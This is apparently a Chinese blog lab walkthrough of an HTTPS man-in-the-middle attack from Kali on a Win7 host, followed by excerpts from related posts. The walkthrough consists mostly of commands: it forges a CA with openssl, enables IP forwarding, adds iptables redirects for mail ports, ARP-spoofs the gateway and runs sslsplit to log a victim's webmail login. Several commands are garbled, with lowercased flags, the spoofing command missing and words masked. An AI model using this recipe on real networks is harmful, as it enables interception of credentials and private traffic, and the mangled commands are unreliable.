HTTPS攻擊(SSL TLS中間人攻擊)

2021-10-03 08:50:30 字數 2792 閱讀 6787

攻擊機:kali

目標機:win7

攻擊前提:

客戶端已經信任偽造證書頒發機構;

攻擊者控制了核發證書頒發機構;

客戶端程式禁止了顯示證書錯誤告警資訊;

攻擊者已經控制客戶端,並強制其信任偽造證書。

角色:客戶端、客戶路由器、真實伺服器、攻擊者**伺服器

(攻擊者**伺服器)攻擊者通過arp欺騙客戶端通過攻擊者做閘道器,資料報通過攻擊者發出。此時,攻擊者就可以分析https網路傳輸中的資料,並且由於攻擊者偽造了ca證書,則自己可以解密出傳輸中的資料。

1、利用openssl生成證書私鑰

openssl genrsa -out ca.key 2048 (4096也行)

2、利用私鑰簽名生成證書

openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

-days 證書有效期

-key 用哪個私鑰生成證書

crt只是根證書,不是ca證書。ca的偽造依賴 crt 這個證書。

1、改檔案(/proc/sys/net/ipv4/ip_forward)引數:

sysctl -w net.ipv4.ip_forward=1

2、iptables埠**規則

iptables -t nat -l 檢視規則

iptables -t nat -f 清空規則

配置規則

實驗中只需以上兩條。

iptables -t nat -a prerouting -p tcp --dport 587 -j redirect --to-ports 8443 #msa

iptables -t nat -a prerouting -p tcp --dport 465 -j redirect --to-ports 8443 #smtps

iptables -t nat -a prerouting -p tcp --dport 993 -j redirect --to-ports 8443 #imaps

iptables -t nat -a prerouting -p tcp --dport 995 -j redirect --to-ports 8443 #pop3s

注:檢查是否有程式占用80、433埠

-t win7 目標主機

-r win7閘道器

命令運下前win7的閘道器

執行命令後:

此時win7的mac位址為:(變成了kali的mac)

mkdir -p test/logdir  //資料內容放在logdir目錄下

sslsplit -d -l connect.log -j /root/test -s /root/test/logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

win7 訪問網頁 mail.163.com

在網易郵箱登入輸入賬戶和密碼:

test/logdir目錄下可看到傳輸的資料

發現密碼沒有被私鑰解密!

原因:

私鑰解密的是在資料傳輸過程解密;

企業方,在登入口載入了加密控制項,密碼先被加密,再被傳輸。

注:突然發現證書居然不是自己偽造的證書?(瀏覽器的問題嗎?)

Https中間人攻擊

https也不是絕對安全的,如下圖所示為中間人劫持攻擊,中間人可以獲取到客戶端與伺服器之間所有的通訊內容。中間人擷取客戶端傳送給伺服器的請求,然後偽裝成客戶端與伺服器進行通訊 將伺服器返回給客戶端的內容傳送給客戶端,偽裝成伺服器與客戶端進行通訊。通過這樣的手段,便可以獲取客戶端和伺服器之間通訊的所有...

Https中間人攻擊

防範方法 一 https連線過程及中間人攻擊原理 https協議就是http ssl協議,如下圖所示為其連線過程 1.https請求 客戶端向服務端傳送https請求 2.生成公鑰和私鑰 服務端收到請求之後,生成公鑰和私鑰。公鑰相當於是鎖,私鑰相當於是鑰匙,只有私鑰才能夠開啟公鑰鎖住的內容 3.返回...

HTTPS 中間人攻擊 (一)https簡單介紹

https是基於http協議,通過ssl或者tls保證資料傳輸的安全 使用數字證書 加密演算法和非對稱金鑰等技術完成資料傳輸的加密和身份認證 相比較於http,主要是改進了 資料的保密性 資料的完整性以及身份驗證。資料的保密性 https通訊過程中的資料均為加密資料,通過第三方手段截獲資料報檢視到的...